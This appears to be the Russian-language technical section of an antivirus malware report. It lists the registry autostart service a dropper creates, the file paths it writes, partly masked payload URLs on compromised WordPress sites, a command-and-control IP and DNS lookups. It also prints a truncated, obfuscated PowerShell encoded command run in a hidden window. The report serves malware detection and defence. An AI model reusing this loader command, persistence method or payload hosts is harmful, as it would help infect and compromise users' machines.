Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\defaultlocationcpl] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\defaultlocationcpl] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe"'
- 'defaultlocationcpl' "%WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe"
- 'defaultlocationcpl' %WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe в %WINDIR%\syswow64\kbdpl1\defaultlocationcpl.exe
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
- '20#.#9.6.174':80
- http://pl###tjogja.com/wp-content/X/
- http://vn####elopers.com/wp-admin/BF/
- http://nu####weekparty.com/wp-includes/bQR/
- http://20#.#9.6.174/lCIDJoKEYExjH/va2agnxciMl01cuzO/XBZUpDq0DOaf4X6/WjkJ1SBWluMhdGIyq/
- DNS ASK pl###tjogja.com
- DNS ASK vn####elopers.com
- DNS ASK nu####weekparty.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...' (со скрытым окном)